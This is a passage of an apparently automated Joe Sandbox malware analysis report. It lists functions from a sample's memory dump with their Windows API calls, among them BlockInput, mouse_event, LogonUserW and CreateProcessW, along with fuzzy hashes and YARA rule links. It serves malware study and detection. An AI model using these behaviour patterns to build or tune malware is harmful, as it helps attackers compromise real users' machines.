Opcode Fuzzy Hash: f72c110b952c863d3e9d145047c4d54f3f4acf4cb5dbbfe9bc84d825478302cf
Instruction Fuzzy Hash: 45012835600158AFDF268F69D885EF93B95EF49326F050125FD561B1B1C331AC25D7A0

Function 0035C220 Relevance: 1.5, APIs: 1, Instructions: 31nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

Part of subcall function 002D2344: GetCursorPos.USER32(?), ref: 002D2357
Part of subcall function 002D2344: ScreenToClient.USER32(003967B0,?), ref: 002D2374
Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000001), ref: 002D2399
Part of subcall function 002D2344: GetAsyncKeyState.USER32(00000002), ref: 002D23A7

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0030BC4F,?,?,?,?,?,00000001,?), ref: 0035C272

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
String ID:
API String ID: 2356834413-0
Opcode ID: 2eb0a02733422aeb2824b2b227c77cf926551a29290ce180b2eeb83a2162ca66
Instruction ID: 92022df5d0b2d76660a2750b7e3aebe374a255e76b144f4254e04ff9aa315915
Opcode Fuzzy Hash: 2eb0a02733422aeb2824b2b227c77cf926551a29290ce180b2eeb83a2162ca66
Instruction Fuzzy Hash: F3F08234204228EFDF06AF49CC06EAA3B95EB14755F004455F9465B2A1CB76AC64DFE0

Function 002D189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,002D1B04,?,?,?,?,?), ref: 002D18E2

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 9cbc79013f17030b6dd7084d75d1bd1351fcf6119c821d5afee1af598a3eac35
Instruction ID: 6eeac3aaeba79a70ebc119e0ca6a6a554e950eaaa3794567c0977b9763df65e3
Opcode Fuzzy Hash: 9cbc79013f17030b6dd7084d75d1bd1351fcf6119c821d5afee1af598a3eac35
Instruction Fuzzy Hash: B3F0BE34610229AFDB0ADF54D86192637AAEB00350F10452AF8528B3A1CB32DC70EB50

Function 003441FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00344218

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: d7019f6e7d2a5783473e547d0038458c584c72e8e91a03c86192bfbcaa78dab8
Instruction ID: 8c552331e02d76f4a76dbb4478d3f9f0323372c4143e5e28a7883c3d4fb28624
Opcode Fuzzy Hash: d7019f6e7d2a5783473e547d0038458c584c72e8e91a03c86192bfbcaa78dab8
Instruction Fuzzy Hash: 05E04F32250214AFC710EF59D844B9AF7ECAF98761F018426FC49DB362DAB0FC408BA0

Function 0035CBAE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0035CBEE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 488fa9b695ceee56aac7c5d17e18f8164544946cccba3aa1c52c5f70dbc51493
Instruction ID: d0ebb8db3e1a75af8b860d42cb886d31bba57c2e659f314f49c05074505f3ce4
Opcode Fuzzy Hash: 488fa9b695ceee56aac7c5d17e18f8164544946cccba3aa1c52c5f70dbc51493
Instruction Fuzzy Hash: 1DF06D35245359AFDB22DF58DC06FC63BA9EB0A760F154459FA11272F2CB707820D7A0

Function 00334EF5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00334F18

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 3b445c714abfa020af341f50e61c161acefeb7c497e40958750b64f002ae51dd
Instruction ID: 39dee2310bf23e1fbb7b2fcaab5e1e2778f83122d44c25e3e6d97a5b3c2655ca
Opcode Fuzzy Hash: 3b445c714abfa020af341f50e61c161acefeb7c497e40958750b64f002ae51dd
Instruction Fuzzy Hash: 18D0C7B41646057DFC1A4B21AC9FF77110DF341792FDD59897201D98D1E8E97C54E035

Function 00328C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,003288D1), ref: 00328CB3

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: c3dfdbd9dd837dacfcc9ade63fe76a90a531a349e137de00ae4758895de05787
Instruction ID: 03d37a13bd640d0ae5f34d684c845726c520d6c988c475e6facdb45665ee1d22
Opcode Fuzzy Hash: c3dfdbd9dd837dacfcc9ade63fe76a90a531a349e137de00ae4758895de05787
Instruction Fuzzy Hash: 1CD05E3226060EAFEF018EA4DC01EBE3B69EB04B01F408111FE15C60A1C775D835AB60

Function 0035CBF9 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0030BC0C,?,?,?,?,?,?), ref: 0035CC24

Part of subcall function 0035B8EF: _memset.LIBCMT ref: 0035B8FE
Part of subcall function 0035B8EF: _memset.LIBCMT ref: 0035B90D
Part of subcall function 0035B8EF: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00397F20,00397F64), ref: 0035B93C
Part of subcall function 0035B8EF: CloseHandle.KERNEL32 ref: 0035B94E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
String ID:
API String ID: 2364484715-0
Opcode ID: ec549624fec65ae8723ac1d57914d5bbf5bb496fe213989a5fc1aa3dccbc1ed8
Instruction ID: 160fa83824a61cd8b619d96fdbcf721f5ec7541edf745099f2452729b3665fe5
Opcode Fuzzy Hash: ec549624fec65ae8723ac1d57914d5bbf5bb496fe213989a5fc1aa3dccbc1ed8
Instruction Fuzzy Hash: 36E04631110208DFCB02AF04DD01E8637A9FB0C346F014011FE050B2B2CB32A960EF50

Function 002D167D Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?,?,002D1AEE,?,?,?), ref: 002D16AB

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 7794ea360096013cc11cf3bf11d6101f6b326bd2a63937e8fdd417d45fcf737f
Instruction ID: a481c53368fa15001cdec7819146ab86c7bccc74f1498477deda2481fd03d011
Opcode Fuzzy Hash: 7794ea360096013cc11cf3bf11d6101f6b326bd2a63937e8fdd417d45fcf737f
Instruction Fuzzy Hash: 42E0EC35504208FBCF06AF90DC12E653B2AFB59354F108459FA450A2A1CA33A921DB50

Function 0035CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0035CBA4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 088eb75a0467a68c252233ee9be852963510cc7d10754f11adc1b921f00a1513
Instruction ID: 1a2b92a770f580442a3025fffaa84d52ba037d4cbba04b082729c872b5ec5321
Opcode Fuzzy Hash: 088eb75a0467a68c252233ee9be852963510cc7d10754f11adc1b921f00a1513
Instruction Fuzzy Hash: A0E0E23520420CEFCB02DF88D845D863BA9AB1D300F014054FA0547272CB72A820EBA1

Function 0035CB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtdllDialogWndProc_W.NTDLL ref: 0035CB75

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: DialogNtdllProc_
String ID:
API String ID: 3239928679-0
Opcode ID: 226f32501a1b2cad96400f2e74b838784047006114777bb2eea73030043d15af
Instruction ID: c0d7697685ae82b1aefcf3f645b7cb1886c78fcc4bf2e30da5f5897a1114f5a3
Opcode Fuzzy Hash: 226f32501a1b2cad96400f2e74b838784047006114777bb2eea73030043d15af
Instruction Fuzzy Hash: 4BE0E23520420CAFCB02DF88D885E863BA9AB1D300F014054FA0547272CB71A820EB61

Function 002D16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D2612: GetWindowLongW.USER32(?,000000EB), ref: 002D2623

Part of subcall function 002D201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002D20D3
Part of subcall function 002D201B: KillTimer.USER32(-00000001,?,?,?,?,002D16CB,00000000,?,?,002D1AE2,?,?), ref: 002D216E

NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,002D1AE2,?,?), ref: 002D16D4

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$DestroyDialogKillLongNtdllProc_Timer
String ID:
API String ID: 2797419724-0
Opcode ID: 978c47ebc46a31e85ebeec944e29f25a2748ee3182f6b67faba000b850c032a1
Instruction ID: 1c1076cd50d8511a4c160327e88b2acecd3c52f1a1ddfe869536c643c4c4224e
Opcode Fuzzy Hash: 978c47ebc46a31e85ebeec944e29f25a2748ee3182f6b67faba000b850c032a1
Instruction Fuzzy Hash: 84D01230140318BBDE132FA1DC17F493A1D9B24751F508421BA04692E3CA71AC20A998

Function 00312230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00312242

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 94eb8d5f53da575d8b3a1eec9d3ee6462cd5bd21efc7d123a6bba3b7cad53f3f
Instruction ID: a556ca769e4c62ab574680cdb97573245a9605bc8b19928cdd0cdb5da46c2cc9
Opcode Fuzzy Hash: 94eb8d5f53da575d8b3a1eec9d3ee6462cd5bd21efc7d123a6bba3b7cad53f3f
Instruction Fuzzy Hash: 79C04CF1805109DBDB06DB90D988DEE77BCAB08315F144055A101F2150D7749B448A71

Function 002FA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 002FA36A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8873933b1294cd451c2584fe849046c3a8796cc1d2f636c0ac5fc41db15bd192
Instruction ID: d97d3514d2958cdb527f79e87841708b558964224c54773251e57d74d40a9f6b
Opcode Fuzzy Hash: 8873933b1294cd451c2584fe849046c3a8796cc1d2f636c0ac5fc41db15bd192
Instruction Fuzzy Hash: 1EA0113000020CAB8A022F82EC08888BFACEA002A2B008020F80C800328B32A8208A80

Function 002E8A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a85784ba63250c4610b2eea46882569721a5a837e2788b159d126e0c3cf1f53
Instruction ID: 4e82841d2d967f55214e280e36865e82f68b2690e5be54ebe20a5386b389c604
Opcode Fuzzy Hash: 9a85784ba63250c4610b2eea46882569721a5a837e2788b159d126e0c3cf1f53
Instruction Fuzzy Hash: EB228C305616A6CBCF2D8F26D0942BD73A1EB02304FB5446BD5CADB691DB30DE91CB60

Function 002F2405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 7ced8352437b878e0d9b9fabe571fffd3721c71bcbfda4d5e289b8dd3d599948
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 4CC1743222519789DB1D4A3A943413EFAE15AA37F135A077DE5B3CB5C4EF20D638D620

Function 002F283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 8cd2b657b97867c3bee8cbd93641d4376ce04a57b99279342f00649ec63bcdc8
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: A5C1A43222519789DB2D4A3AC43413EFBE15AA37F135A077DE5B2DB5C4EF20D6389620

Function 018F3610 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 72659219a2e67d890ded1afaad8c10771d6f0f6bdc8edba7aaa3117c9c3d238d
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 4041D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40

Function 018F3500 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 8d940946f38633ab0abb6342bdc351ad741907fa8f7676c7fdc4330bc32257bf
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: 8F018078A05109EFCB44DF98C5949AEF7B5FB88310F208599ED19A7701E730AE51DB80

Function 018F34A0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1661604968.00000000018F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_18f0000_6ddrUd6iQo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: edf95de7bef986276a2e69db3ac687657506df19041640c9b42cc51541955fdf
